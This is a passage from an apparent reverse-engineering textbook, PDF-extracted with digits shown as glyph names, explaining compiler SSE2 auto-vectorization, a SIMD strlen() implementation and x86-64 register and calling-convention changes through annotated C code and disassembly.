/one.pnum/one.pnum/one.pnumWikipedia: vectorization
/one.pnum/one.pnum/two.pnummultiplication result
/one.pnum/one.pnum/three.pnumMore about Intel C++ automatic vectorization: Excerpt: Effective Automatic Vectorization
/one.pnum/three.pnum/seven.pnum
int f (int sz, int *ar1, int *ar2, int *ar3)
{
for (int i=0; i<sz; i++)
ar3[i]=ar1[i]+ar2[i];
return 0;
};
Intel C++
Let’s compile it with Intel C++ /one.pnum/one.pnum./one.pnum./zero.pnum/five.pnum/one.pnum win/three.pnum/two.pnum:
icl intel.cpp /QaxSSE2 /Faintel.asm /Ox
We got (in IDA /five.pnum):
; int __cdecl f(int, int *, int *, int *)
public ?f@@YAHHPAH00@Z
?f@@YAHHPAH00@Z proc near
var_10 = dword ptr -10h
sz = dword ptr 4
ar1 = dword ptr 8
ar2 = dword ptr 0Ch
ar3 = dword ptr 10h
push edi
push esi
push ebx
push esi
mov edx, [esp+10h+sz]
test edx, edx
jle loc_15B
mov eax, [esp+10h+ar3]
cmp edx, 6
jle loc_143
cmp eax, [esp+10h+ar2]
jbe short loc_36
mov esi, [esp+10h+ar2]
sub esi, eax
lea ecx, ds:0[edx*4]
neg esi
cmp ecx, esi
jbe short loc_55
loc_36: ; CODE XREF: f(int,int *,int *,int *)+21
cmp eax, [esp+10h+ar2]
jnb loc_143
mov esi, [esp+10h+ar2]
sub esi, eax
lea ecx, ds:0[edx*4]
cmp esi, ecx
jb loc_143
loc_55: ; CODE XREF: f(int,int *,int *,int *)+34
cmp eax, [esp+10h+ar1]
jbe short loc_67
mov esi, [esp+10h+ar1]
sub esi, eax
neg esi
cmp ecx, esi
jbe short loc_7F
loc_67: ; CODE XREF: f(int,int *,int *,int *)+59
/one.pnum/three.pnum/eight.pnum
cmp eax, [esp+10h+ar1]
jnb loc_143
mov esi, [esp+10h+ar1]
sub esi, eax
cmp esi, ecx
jb loc_143
loc_7F: ; CODE XREF: f(int,int *,int *,int *)+65
mov edi, eax ; edi = ar1
and edi, 0Fh ; is ar1 16-byte aligned?
jz short loc_9A ; yes
test edi, 3
jnz loc_162
neg edi
add edi, 10h
shr edi, 2
loc_9A: ; CODE XREF: f(int,int *,int *,int *)+84
lea ecx, [edi+4]
cmp edx, ecx
jl loc_162
mov ecx, edx
sub ecx, edi
and ecx, 3
neg ecx
add ecx, edx
test edi, edi
jbe short loc_D6
mov ebx, [esp+10h+ar2]
mov [esp+10h+var_10], ecx
mov ecx, [esp+10h+ar1]
xor esi, esi
loc_C1: ; CODE XREF: f(int,int *,int *,int *)+CD
mov edx, [ecx+esi*4]
add edx, [ebx+esi*4]
mov [eax+esi*4], edx
inc esi
cmp esi, edi
jb short loc_C1
mov ecx, [esp+10h+var_10]
mov edx, [esp+10h+sz]
loc_D6: ; CODE XREF: f(int,int *,int *,int *)+B2
mov esi, [esp+10h+ar2]
lea esi, [esi+edi*4] ; is ar2+i*4 16-byte aligned?
test esi, 0Fh
jz short loc_109 ; yes!
mov ebx, [esp+10h+ar1]
mov esi, [esp+10h+ar2]
loc_ED: ; CODE XREF: f(int,int *,int *,int *)+105
movdqu xmm1, xmmword ptr [ebx+edi*4]
movdqu xmm0, xmmword ptr [esi+edi*4] ; ar2+i*4 is not 16-byte aligned, so load it to xmm0
paddd xmm1, xmm0
movdqa xmmword ptr [eax+edi*4], xmm1
add edi, 4
cmp edi, ecx
jb short loc_ED
jmp short loc_127
; ---------------------------------------------------------------------------
loc_109: ; CODE XREF: f(int,int *,int *,int *)+E3
mov ebx, [esp+10h+ar1]
mov esi, [esp+10h+ar2]
/one.pnum/three.pnum/nine.pnum
loc_111: ; CODE XREF: f(int,int *,int *,int *)+125
movdqu xmm0, xmmword ptr [ebx+edi*4]
paddd xmm0, xmmword ptr [esi+edi*4]
movdqa xmmword ptr [eax+edi*4], xmm0
add edi, 4
cmp edi, ecx
jb short loc_111
loc_127: ; CODE XREF: f(int,int *,int *,int *)+107
; f(int,int *,int *,int *)+164
cmp ecx, edx
jnb short loc_15B
mov esi, [esp+10h+ar1]
mov edi, [esp+10h+ar2]
loc_133: ; CODE XREF: f(int,int *,int *,int *)+13F
mov ebx, [esi+ecx*4]
add ebx, [edi+ecx*4]
mov [eax+ecx*4], ebx
inc ecx
cmp ecx, edx
jb short loc_133
jmp short loc_15B
; ---------------------------------------------------------------------------
loc_143: ; CODE XREF: f(int,int *,int *,int *)+17
; f(int,int *,int *,int *)+3A ...
mov esi, [esp+10h+ar1]
mov edi, [esp+10h+ar2]
xor ecx, ecx
loc_14D: ; CODE XREF: f(int,int *,int *,int *)+159
mov ebx, [esi+ecx*4]
add ebx, [edi+ecx*4]
mov [eax+ecx*4], ebx
inc ecx
cmp ecx, edx
jb short loc_14D
loc_15B: ; CODE XREF: f(int,int *,int *,int *)+A
; f(int,int *,int *,int *)+129 ...
xor eax, eax
pop ecx
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_162: ; CODE XREF: f(int,int *,int *,int *)+8C
; f(int,int *,int *,int *)+9F
xor ecx, ecx
jmp short loc_127
?f@@YAHHPAH00@Z endp
SSE/two.pnum-related instructions are:
∙MOVDQU (Move Unaligned Double Quadword ) — it just load /one.pnum/six.pnum bytes from memory into XMM-register.
∙PADDD (Add Packed Integers ) — adding /four.pnum pairs of /three.pnum/two.pnum-bit numbers and leaving result in first operand. By the
way, no exception raised in case of overflow and no flags will be set, just low /three.pnum/two.pnum-bit of result will be stored.
If one ofPADDD operands — address of value in memory, address should be aligned by /one.pnum/six.pnum-byte border. If it’s
not aligned, exception will be raised/one.pnum/one.pnum/four.pnum.
/one.pnum/one.pnum/four.pnumMore about data aligning: Wikipedia: Data structure alignment
/one.pnum/four.pnum/zero.pnum
∙MOVDQA (Move Aligned Double Quadword ) — the same as MOVDQU , but requires address of value in memory
to be aligned by /one.pnum/six.pnum-bit border. If it’s not aligned, exception will be raised. MOVDQA works faster than MOVDQU ,
but requires aforesaid.
So, these SSE/two.pnum-instructions will be executed only in case if there are more /four.pnum pairs to work on plus pointer ar3
is aligned on /one.pnum/six.pnum-byte border.
More than that, if ar2is aligned on /one.pnum/six.pnum-byte border too, this fragment of code will be executed:
movdqu xmm0, xmmword ptr [ebx+edi*4] ; ar1+i*4
paddd xmm0, xmmword ptr [esi+edi*4] ; ar2+i*4
movdqa xmmword ptr [eax+edi*4], xmm0 ; ar3+i*4
Otherwise, value from ar2will be loaded to XMM0 usingMOVDQU , it doesn’t require aligned pointer, but may
work slower:
movdqu xmm1, xmmword ptr [ebx+edi*4] ; ar1+i*4
movdqu xmm0, xmmword ptr [esi+edi*4] ; ar2+i*4 is not 16-byte aligned, so load it to xmm0
paddd xmm1, xmm0
movdqa xmmword ptr [eax+edi*4], xmm1 ; ar3+i*4
In all other cases, non-SSE/two.pnum code will be executed.
GCC
GCC may also vectorize in some simple cases/one.pnum/one.pnum/five.pnum, if to use -O3option and to turn on SSE/two.pnum support: -msse2 .
What we got (GCC /four.pnum./four.pnum./one.pnum):
; f(int, int *, int *, int *)
public _Z1fiPiS_S_
_Z1fiPiS_S_ proc near
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push edi
push esi
push ebx
sub esp, 0Ch
mov ecx, [ebp+arg_0]
mov esi, [ebp+arg_4]
mov edi, [ebp+arg_8]
mov ebx, [ebp+arg_C]
test ecx, ecx
jle short loc_80484D8
cmp ecx, 6
lea eax, [ebx+10h]
ja short loc_80484E8
loc_80484C1: ; CODE XREF: f(int,int *,int *,int *)+4B
; f(int,int *,int *,int *)+61 ...
xor eax, eax
nop
lea esi, [esi+0]
loc_80484C8: ; CODE XREF: f(int,int *,int *,int *)+36
mov edx, [edi+eax*4]
/one.pnum/one.pnum/five.pnumMore about GCC vectorization support: http://gcc.gnu.org/projects/tree-ssa/vectorization.html
/one.pnum/four.pnum/one.pnum
add edx, [esi+eax*4]
mov [ebx+eax*4], edx
add eax, 1
cmp eax, ecx
jnz short loc_80484C8
loc_80484D8: ; CODE XREF: f(int,int *,int *,int *)+17
; f(int,int *,int *,int *)+A5
add esp, 0Ch
xor eax, eax
pop ebx
pop esi
pop edi
pop ebp
retn
; ---------------------------------------------------------------------------
align 8
loc_80484E8: ; CODE XREF: f(int,int *,int *,int *)+1F
test bl, 0Fh
jnz short loc_80484C1
lea edx, [esi+10h]
cmp ebx, edx
jbe loc_8048578
loc_80484F8: ; CODE XREF: f(int,int *,int *,int *)+E0
lea edx, [edi+10h]
cmp ebx, edx
ja short loc_8048503
cmp edi, eax
jbe short loc_80484C1
loc_8048503: ; CODE XREF: f(int,int *,int *,int *)+5D
mov eax, ecx
shr eax, 2
mov [ebp+var_14], eax
shl eax, 2
test eax, eax
mov [ebp+var_10], eax
jz short loc_8048547
mov [ebp+var_18], ecx
mov ecx, [ebp+var_14]
xor eax, eax
xor edx, edx
nop
loc_8048520: ; CODE XREF: f(int,int *,int *,int *)+9B
movdqu xmm1, xmmword ptr [edi+eax]
movdqu xmm0, xmmword ptr [esi+eax]
add edx, 1
paddd xmm0, xmm1
movdqa xmmword ptr [ebx+eax], xmm0
add eax, 10h
cmp edx, ecx
jb short loc_8048520
mov ecx, [ebp+var_18]
mov eax, [ebp+var_10]
cmp ecx, eax
jz short loc_80484D8
loc_8048547: ; CODE XREF: f(int,int *,int *,int *)+73
lea edx, ds:0[eax*4]
add esi, edx
add edi, edx
add ebx, edx
lea esi, [esi+0]
/one.pnum/four.pnum/two.pnum
loc_8048558: ; CODE XREF: f(int,int *,int *,int *)+CC
mov edx, [edi]
add eax, 1
add edi, 4
add edx, [esi]
add esi, 4
mov [ebx], edx
add ebx, 4
cmp ecx, eax
jg short loc_8048558
add esp, 0Ch
xor eax, eax
pop ebx
pop esi
pop edi
pop ebp
retn
; ---------------------------------------------------------------------------
loc_8048578: ; CODE XREF: f(int,int *,int *,int *)+52
cmp eax, esi
jnb loc_80484C1
jmp loc_80484F8
_Z1fiPiS_S_ endp
Almost the same, however, not as meticulously as Intel C++ doing it.
/one.pnum./two.pnum/zero.pnum./two.pnum SIMD strlen() implementation
It should be noted that SIMD-instructions may be inserted into C/C++ code via special macros/one.pnum/one.pnum/six.pnum. As of MSVC, some
of them are located in intrin.h file.
It is possible to implement strlen() function/one.pnum/one.pnum/seven.pnumusing SIMD-instructions, working /two.pnum-/two.pnum./five.pnum times faster than usual
implementation. This function will load /one.pnum/six.pnum characters into XMM-register and check each against zero.
size_t strlen_sse2(const char *str)
{
register size_t len = 0;
const char *s=str;
bool str_is_aligned=(((unsigned int)str)&0xFFFFFFF0) == (unsigned int)str;
if (str_is_aligned==false)
return strlen (str);
__m128i xmm0 = _mm_setzero_si128();
__m128i xmm1;
int mask = 0;
for (;;)
{
xmm1 = _mm_load_si128((__m128i *)s);
xmm1 = _mm_cmpeq_epi8(xmm1, xmm0);
if ((mask = _mm_movemask_epi8(xmm1)) != 0)
{
unsigned long pos;
_BitScanForward(&pos, mask);
len += (size_t)pos;
break;
}
s += sizeof(__m128i);
len += sizeof(__m128i);
/one.pnum/one.pnum/six.pnumMSDN: MMX, SSE, and SSE/two.pnum Intrinsics
/one.pnum/one.pnum/seven.pnumstrlen() — standard C library function for calculating string length
/one.pnum/four.pnum/three.pnum
};
return len;
}
(the example is based on source code from there).
Let’s compile in MSVC /two.pnum/zero.pnum/one.pnum/zero.pnum with /Oxoption:
_pos$75552 = -4 ; size = 4
_str$ = 8 ; size = 4
?strlen_sse2@@YAIPBD@Z PROC ; strlen_sse2
push ebp
mov ebp, esp
and esp, -16 ; fffffff0H
mov eax, DWORD PTR _str$[ebp]
sub esp, 12 ; 0000000cH
push esi
mov esi, eax
and esi, -16 ; fffffff0H
xor edx, edx
mov ecx, eax
cmp esi, eax
je SHORT $LN4@strlen_sse
lea edx, DWORD PTR [eax+1]
npad 3
$LL11@strlen_sse:
mov cl, BYTE PTR [eax]
inc eax
test cl, cl
jne SHORT $LL11@strlen_sse
sub eax, edx
pop esi
mov esp, ebp
pop ebp
ret 0
$LN4@strlen_sse:
movdqa xmm1, XMMWORD PTR [eax]
pxor xmm0, xmm0
pcmpeqb xmm1, xmm0
pmovmskb eax, xmm1
test eax, eax
jne SHORT $LN9@strlen_sse
$LL3@strlen_sse:
movdqa xmm1, XMMWORD PTR [ecx+16]
add ecx, 16 ; 00000010H
pcmpeqb xmm1, xmm0
add edx, 16 ; 00000010H
pmovmskb eax, xmm1
test eax, eax
je SHORT $LL3@strlen_sse
$LN9@strlen_sse:
bsf eax, eax
mov ecx, eax
mov DWORD PTR _pos$75552[esp+16], eax
lea eax, DWORD PTR [ecx+edx]
pop esi
mov esp, ebp
pop ebp
ret 0
?strlen_sse2@@YAIPBD@Z ENDP ; strlen_sse2
First of all, we check strpointer, if it’s aligned by /one.pnum/six.pnum-byte border. If not, let’s call usual strlen() implementa-
tion.
Then, load next /one.pnum/six.pnum bytes into XMM1 register using MOVDQA instruction.
/one.pnum/four.pnum/four.pnum
Observant reader might ask, why MOVDQU cannot be used here, because it can load data from the memory
regardless the fact if the pointer aligned or not.
Yes, it might be done in this way: if pointer is aligned, load data using MOVDQA , if not — use slower MOVDQU .
But here we are may stick into hard to notice problem:
In Windows NT line of operation systems/one.pnum/one.pnum/eight.pnum, but not limited to it, memory allocated by pages of /four.pnum KiB (/four.pnum/zero.pnum/nine.pnum/six.pnum
bytes). Each win/three.pnum/two.pnum-process has ostensibly /four.pnum GiB, but in fact, only some parts of address space are connected to
real physical memory. If the process accessing to the absent memory block, exception will be raised. That’s how
virtual memory works/one.pnum/one.pnum/nine.pnum.
So, some function loading /one.pnum/six.pnum bytes at once, may step over a border of allocated memory block. Let’s consider,
OS allocated /eight.pnum/one.pnum/nine.pnum/two.pnum (/zero.pnumx/two.pnum/zero.pnum/zero.pnum/zero.pnum) bytes at the address /zero.pnumx/zero.pnum/zero.pnum/eight.pnumc/zero.pnum/zero.pnum/zero.pnum/zero.pnum. Thus, the block is the bytes starting from address
/zero.pnumx/zero.pnum/zero.pnum/eight.pnumc/zero.pnum/zero.pnum/zero.pnum/zero.pnum to /zero.pnumx/zero.pnum/zero.pnum/eight.pnumc/one.pnumfff inclusive.
A/f_ter that block, that is, starting from address /zero.pnumx/zero.pnum/zero.pnum/eight.pnumc/two.pnum/zero.pnum/zero.pnum/eight.pnum there are nothing at all, e.g., OS not allocated any
memory there. Attempt to access a memory starting from that address will raise exception.
And let’s consider, the program holding some string containing /five.pnum characters almost at the end of block, and
that’s not a crime.
/zero.pnumx/zero.pnum/zero.pnum/eight.pnumc/one.pnumff/eight.pnum ’h’
/zero.pnumx/zero.pnum/zero.pnum/eight.pnumc/one.pnumff/nine.pnum ’e’
/zero.pnumx/zero.pnum/zero.pnum/eight.pnumc/one.pnumffa ’l’
/zero.pnumx/zero.pnum/zero.pnum/eight.pnumc/one.pnumffb ’l’
/zero.pnumx/zero.pnum/zero.pnum/eight.pnumc/one.pnumffc ’o’
/zero.pnumx/zero.pnum/zero.pnum/eight.pnumc/one.pnumffd ’\x/zero.pnum/zero.pnum’
/zero.pnumx/zero.pnum/zero.pnum/eight.pnumc/one.pnumffe random noise
/zero.pnumx/zero.pnum/zero.pnum/eight.pnumc/one.pnumfff random noise
So, in usual conditions the program calling strlen() passing it a pointer to string ’hello’ lying in memory
at address /zero.pnumx/zero.pnum/zero.pnum/eight.pnumc/one.pnumff/eight.pnum. strlen() will read one byte at a time until /zero.pnumx/zero.pnum/zero.pnum/eight.pnumc/one.pnumffd, where zero-byte, and so here it will
stop working.
Now if we implement own strlen() reading /one.pnum/six.pnum byte at once, starting at any address, will it be alligned or not,
MOVDQU may attempt to load /one.pnum/six.pnum bytes at once at address /zero.pnumx/zero.pnum/zero.pnum/eight.pnumc/one.pnumff/eight.pnum up to /zero.pnumx/zero.pnum/zero.pnum/eight.pnumc/two.pnum/zero.pnum/zero.pnum/eight.pnum, and then exception will be
raised. That’s the situation to be avoided, of course.
So then we’ll work only with the addresses aligned by /one.pnum/six.pnum byte border, what in combination with a knowledge
of operation system page size is usually aligned by /one.pnum/six.pnum byte too, give us some warranty our function will not read
from unallocated memory.
Let’s back to our function.
_mm_setzero_si128() — is a macro generating pxor xmm0, xmm0 — instruction just clear /XMMZERO regis-
ter
_mm_load_si128() — is a macro for MOVDQA , it just loading /one.pnum/six.pnum bytes from the address in XMM1 .
_mm_cmpeq_epi8() — is a macro for PCMPEQB , is an instruction comparing two XMM-registers bytewise.
And if some byte was equals to other, there will be /zero.pnumxff at this place in result or /zero.pnum if otherwise.
For example.
XMM1: 11223344556677880000000000000000
XMM0: 11ab3444007877881111111111111111
A/f_terpcmpeqb xmm1, xmm0 execution, XMM1 register will contain:
XMM1: ff0000ff0000ffff0000000000000000
In our case, this instruction comparing each /one.pnum/six.pnum-byte block with the block of /one.pnum/six.pnum zero-bytes, was set in XMM0 by
pxor xmm0, xmm0 .
The next macro is _mm_movemask_epi8() — that isPMOVMSKB instruction.
It is very useful if to use it with PCMPEQB .
/one.pnum/one.pnum/eight.pnumWindows NT, /two.pnum/zero.pnum/zero.pnum/zero.pnum, XP, Vista, /seven.pnum, /eight.pnum
/one.pnum/one.pnum/nine.pnumhttp://en.wikipedia.org/wiki/Page_(computer_memory)
/one.pnum/four.pnum/five.pnum
pmovmskb eax, xmm1
This instruction will set first EAXbit into /one.pnum if most significant bit of the first byte in XMM1 is /one.pnum. In other words, if
first byte of XMM1 register is /zero.pnumxff, first EAXbit will be set to /one.pnum too.
If second byte in XMM1 register is /zero.pnumxff, then second EAXbit will be set to /one.pnum too. In other words, the instruction is
answer to the question which bytes in XMM1 are /zero.pnumxff? And will prepare /one.pnum/six.pnum bits in EAX. OtherEAXbits will be cleared.
By the way, do not forget about this feature of our algorithm:
There might be /one.pnum/six.pnum bytes on input like hello\x00garbage\x00ab
It’s a’hello’ string, terminating zero a/f_ter and some random noise in memory.
If we load these /one.pnum/six.pnum bytes into XMM1 and compare them with zeroed XMM0 , we will get something like (I use here
order from MSB/one.pnum/two.pnum/zero.pnumto LSB/one.pnum/two.pnum/one.pnum):
XMM1: 0000ff00000000000000ff0000000000
This mean, the instruction found two zero bytes, and that’s not surprising.
PMOVMSKB in our case will prepare EAXlike (in binary representation): /zero.pnum/zero.pnum/one.pnum/zero.pnum/zero.pnum/zero.pnum/zero.pnum/zero.pnum/zero.pnum/zero.pnum/one.pnum/zero.pnum/zero.pnum/zero.pnum/zero.pnum/zero.pnumb .
Obviously, our function should consider only first zero and ignore others.
The next instruction — BSF(Bit Scan Forward ). This instruction find first bit set to /one.pnum and stores its position into
first operand.
EAX=0010000000100000b
A/f_terbsf eax, eax instruction execution, EAXwill contain /five.pnum, this mean, /one.pnum found at /five.pnumth bit position (starting
from zero).
MSVC has a macro for this instruction: _BitScanForward .
Now it’s simple. If zero byte found, its position added to what we already counted and now we have ready to
return result.
Almost all.
By the way, it’s also should be noted, MSVC compiler emitted two loop bodies side by side, for optimization.
By the way, SSE /four.pnum./two.pnum (appeared in Intel Core i/seven.pnum) offers more instructions where these string manipulations might
be even easier: http://www.strchr.com/strcmp_and_strlen_using_sse_4.2
/one.pnum/two.pnum/zero.pnummost significant bit
/one.pnum/two.pnum/one.pnumleast significant bit
/one.pnum/four.pnum/six.pnum
/one.pnum./two.pnum/one.pnum /six.pnum/four.pnum bits
/one.pnum./two.pnum/one.pnum./one.pnum x/eight.pnum/six.pnum-/six.pnum/four.pnum
It’s a /six.pnum/four.pnum-bit extension to x/eight.pnum/six.pnum-architecture.
From the reverse engineer’s perspective, most important differences are:
∙Almost all registers (except FPU and SIMD) are extended to /six.pnum/four.pnum bits and got r- prefix. /eight.pnum additional registers
added. Now general purpose registers are: rax,rbx,rcx,rdx,rbp,rsp,rsi,rdi,r8,r9,r10,r11,r12,r13,
r14,r15.
It’s still possible to access to older register parts as usual. For example, it’s possible to access lower /three.pnum/two.pnum-bit
part ofRAXusingEAX.
Newr8-r15 registers also has its lower parts :r8d-r15d (lower /three.pnum/two.pnum-bit parts), r8w-r15w (lower /one.pnum/six.pnum-bit parts),
r8b-r15b (lower /eight.pnum-bit parts).
SIMD-registers number are doubled: from /eight.pnum to /one.pnum/six.pnum: XMM0-XMM15 .
∙In Win/six.pnum/four.pnum, function calling convention is slightly different, somewhat resembling fastcall /two.pnum./five.pnum./three.pnum. First /four.pnum argu-
ments stored in RCX,RDX,R8,R9registers, others — in stack. Caller function should also allocate /three.pnum/two.pnum bytes so
the callee may save there /four.pnum first arguments and use these registers for own needs. Short functions may use
arguments just from registers, but larger may save their values into stack.
See also section about calling conventions /two.pnum./five.pnum.
∙Cinttype is still /three.pnum/two.pnum-bit for compatibility.
∙All pointers are /six.pnum/four.pnum-bit now.
Since now registers number are doubled, compilers has more space now for maneuvering calling register allo-
cation/one.pnum/two.pnum/two.pnum. What it meanings for us, emitted code will contain less local variables.
For example, function calculating first S-box of DES encryption algorithm, it processing /three.pnum/two.pnum//six.pnum/four.pnum//one.pnum/two.pnum/eight.pnum//two.pnum/five.pnum/six.pnum values
at once (depending on DES_type type (uint/three.pnum/two.pnum, uint/six.pnum/four.pnum, SSE/two.pnum or AVX)) using bitslice DES method (read more about
this method here /one.pnum./two.pnum/zero.pnum):
/*
* Generated S-box files.
*
* This software may be modified, redistributed, and used for any purpose,
* so long as its origin is acknowledged.
*
* Produced by Matthew Kwan - March 1998
*/
#ifdef _WIN64
#define DES_type unsigned __int64
#else
#define DES_type unsigned int
#endif
void
s1 (
DES_type a1,
DES_type a2,
DES_type a3,
DES_type a4,
DES_type a5,
DES_type a6,
DES_type *out1,
DES_type *out2,
DES_type *out3,
/one.pnum/two.pnum/two.pnumassigning variables to registers
/one.pnum/four.pnum/seven.pnum
DES_type *out4
) {
DES_type x1, x2, x3, x4, x5, x6, x7, x8;
DES_type x9, x10, x11, x12, x13, x14, x15, x16;
DES_type x17, x18, x19, x20, x21, x22, x23, x24;
DES_type x25, x26, x27, x28, x29, x30, x31, x32;
DES_type x33, x34, x35, x36, x37, x38, x39, x40;
DES_type x41, x42, x43, x44, x45, x46, x47, x48;
DES_type x49, x50, x51, x52, x53, x54, x55, x56;
x1 = a3 & ~a5;
x2 = x1 ^ a4;
x3 = a3 & ~a4;
x4 = x3 | a5;
x5 = a6 & x4;
x6 = x2 ^ x5;
x7 = a4 & ~a5;
x8 = a3 ^ a4;
x9 = a6 & ~x8;
x10 = x7 ^ x9;
x11 = a2 | x10;
x12 = x6 ^ x11;
x13 = a5 ^ x5;
x14 = x13 & x8;
x15 = a5 & ~a4;
x16 = x3 ^ x14;
x17 = a6 | x16;
x18 = x15 ^ x17;
x19 = a2 | x18;
x20 = x14 ^ x19;
x21 = a1 & x20;
x22 = x12 ^ ~x21;
*out2 ^= x22;
x23 = x1 | x5;
x24 = x23 ^ x8;
x25 = x18 & ~x2;
x26 = a2 & ~x25;
x27 = x24 ^ x26;
x28 = x6 | x7;
x29 = x28 ^ x25;
x30 = x9 ^ x24;
x31 = x18 & ~x30;
x32 = a2 & x31;
x33 = x29 ^ x32;
x34 = a1 & x33;
x35 = x27 ^ x34;
*out4 ^= x35;
x36 = a3 & x28;
x37 = x18 & ~x36;
x38 = a2 | x3;
x39 = x37 ^ x38;
x40 = a3 | x31;
x41 = x24 & ~x37;
x42 = x41 | x3;
x43 = x42 & ~a2;
x44 = x40 ^ x43;
x45 = a1 & ~x44;
x46 = x39 ^ ~x45;
*out1 ^= x46;
x47 = x33 & ~x9;
x48 = x47 ^ x39;
x49 = x4 ^ x36;
x50 = x49 & ~x5;
x51 = x42 | x18;
x52 = x51 ^ a5;
x53 = a2 & ~x52;
/one.pnum/four.pnum/eight.pnum
x54 = x50 ^ x53;
x55 = a1 | x54;
x56 = x48 ^ ~x55;
*out3 ^= x56;
}
There is a lot of local variables. Of course, not them all will be in local stack. Let’s compile it with MSVC /two.pnum/zero.pnum/zero.pnum/eight.pnum
with/Oxoption:
Listing /one.pnum./one.pnum/one.pnum/two.pnum: Optimizing MSVC /two.pnum/zero.pnum/zero.pnum/eight.pnum
PUBLIC _s1
; Function compile flags: /Ogtpy
_TEXT SEGMENT
_x6$ = -20 ; size = 4
_x3$ = -16 ; size = 4
_x1$ = -12 ; size = 4
_x8$ = -8 ; size = 4
_x4$ = -4 ; size = 4
_a1$ = 8 ; size = 4
_a2$ = 12 ; size = 4
_a3$ = 16 ; size = 4
_x33$ = 20 ; size = 4
_x7$ = 20 ; size = 4
_a4$ = 20 ; size = 4
_a5$ = 24 ; size = 4
tv326 = 28 ; size = 4
_x36$ = 28 ; size = 4
_x28$ = 28 ; size = 4
_a6$ = 28 ; size = 4
_out1$ = 32 ; size = 4
_x24$ = 36 ; size = 4
_out2$ = 36 ; size = 4
_out3$ = 40 ; size = 4
_out4$ = 44 ; size = 4
_s1 PROC
sub esp, 20 ; 00000014H
mov edx, DWORD PTR _a5$[esp+16]
push ebx
mov ebx, DWORD PTR _a4$[esp+20]
push ebp
push esi
mov esi, DWORD PTR _a3$[esp+28]
push edi
mov edi, ebx
not edi
mov ebp, edi
and edi, DWORD PTR _a5$[esp+32]
mov ecx, edx
not ecx
and ebp, esi
mov eax, ecx
and eax, esi
and ecx, ebx
mov DWORD PTR _x1$[esp+36], eax
xor eax, ebx
mov esi, ebp
or esi, edx
mov DWORD PTR _x4$[esp+36], esi
and esi, DWORD PTR _a6$[esp+32]
mov DWORD PTR _x7$[esp+32], ecx
mov edx, esi
xor edx, eax
mov DWORD PTR _x6$[esp+36], edx
mov edx, DWORD PTR _a3$[esp+32]
xor edx, ebx
mov ebx, esi
/one.pnum/four.pnum/nine.pnum
xor ebx, DWORD PTR _a5$[esp+32]
mov DWORD PTR _x8$[esp+36], edx
and ebx, edx
mov ecx, edx
mov edx, ebx
xor edx, ebp
or edx, DWORD PTR _a6$[esp+32]
not ecx
and ecx, DWORD PTR _a6$[esp+32]
xor edx, edi
mov edi, edx
or edi, DWORD PTR _a2$[esp+32]
mov DWORD PTR _x3$[esp+36], ebp
mov ebp, DWORD PTR _a2$[esp+32]
xor edi, ebx
and edi, DWORD PTR _a1$[esp+32]
mov ebx, ecx
xor ebx, DWORD PTR _x7$[esp+32]
not edi
or ebx, ebp
xor edi, ebx
mov ebx, edi
mov edi, DWORD PTR _out2$[esp+32]
xor ebx, DWORD PTR [edi]
not eax
xor ebx, DWORD PTR _x6$[esp+36]
and eax, edx
mov DWORD PTR [edi], ebx
mov ebx, DWORD PTR _x7$[esp+32]
or ebx, DWORD PTR _x6$[esp+36]
mov edi, esi
or edi, DWORD PTR _x1$[esp+36]
mov DWORD PTR _x28$[esp+32], ebx
xor edi, DWORD PTR _x8$[esp+36]
mov DWORD PTR _x24$[esp+32], edi
xor edi, ecx
not edi
and edi, edx
mov ebx, edi
and ebx, ebp
xor ebx, DWORD PTR _x28$[esp+32]
xor ebx, eax
not eax
mov DWORD PTR _x33$[esp+32], ebx
and ebx, DWORD PTR _a1$[esp+32]
and eax, ebp
xor eax, ebx
mov ebx, DWORD PTR _out4$[esp+32]
xor eax, DWORD PTR [ebx]
xor eax, DWORD PTR _x24$[esp+32]
mov DWORD PTR [ebx], eax
mov eax, DWORD PTR _x28$[esp+32]
and eax, DWORD PTR _a3$[esp+32]
mov ebx, DWORD PTR _x3$[esp+36]
or edi, DWORD PTR _a3$[esp+32]
mov DWORD PTR _x36$[esp+32], eax
not eax
and eax, edx
or ebx, ebp
xor ebx, eax
not eax
and eax, DWORD PTR _x24$[esp+32]
not ebp
or eax, DWORD PTR _x3$[esp+36]
not esi
and ebp, eax
/one.pnum/five.pnum/zero.pnum
or eax, edx
xor eax, DWORD PTR _a5$[esp+32]
mov edx, DWORD PTR _x36$[esp+32]
xor edx, DWORD PTR _x4$[esp+36]
xor ebp, edi
mov edi, DWORD PTR _out1$[esp+32]
not eax
and eax, DWORD PTR _a2$[esp+32]
not ebp
and ebp, DWORD PTR _a1$[esp+32]
and edx, esi
xor eax, edx
or eax, DWORD PTR _a1$[esp+32]
not ebp
xor ebp, DWORD PTR [edi]
not ecx
and ecx, DWORD PTR _x33$[esp+32]
xor ebp, ebx
not eax
mov DWORD PTR [edi], ebp
xor eax, ecx
mov ecx, DWORD PTR _out3$[esp+32]
xor eax, DWORD PTR [ecx]
pop edi
pop esi
xor eax, ebx
pop ebp
mov DWORD PTR [ecx], eax
pop ebx
add esp, 20 ; 00000014H
ret 0
_s1 ENDP
/five.pnum variables was allocated in local stack by compiler.
Now let’s try the same thing in /six.pnum/four.pnum-bit version of MSVC /two.pnum/zero.pnum/zero.pnum/eight.pnum:
Listing /one.pnum./one.pnum/one.pnum/three.pnum: Optimizing MSVC /two.pnum/zero.pnum/zero.pnum/eight.pnum
a1$ = 56
a2$ = 64
a3$ = 72
a4$ = 80
x36$1$ = 88
a5$ = 88
a6$ = 96
out1$ = 104
out2$ = 112
out3$ = 120
out4$ = 128
s1 PROC
$LN3:
mov QWORD PTR [rsp+24], rbx
mov QWORD PTR [rsp+32], rbp
mov QWORD PTR [rsp+16], rdx
mov QWORD PTR [rsp+8], rcx
push rsi
push rdi
push r12
push r13
push r14
push r15
mov r15, QWORD PTR a5$[rsp]
mov rcx, QWORD PTR a6$[rsp]
mov rbp, r8
mov r10, r9
mov rax, r15
mov rdx, rbp
/one.pnum/five.pnum/one.pnum
not rax
xor rdx, r9
not r10
mov r11, rax
and rax, r9
mov rsi, r10
mov QWORD PTR x36$1$[rsp], rax
and r11, r8
and rsi, r8
and r10, r15
mov r13, rdx
mov rbx, r11
xor rbx, r9
mov r9, QWORD PTR a2$[rsp]
mov r12, rsi
or r12, r15
not r13
and r13, rcx
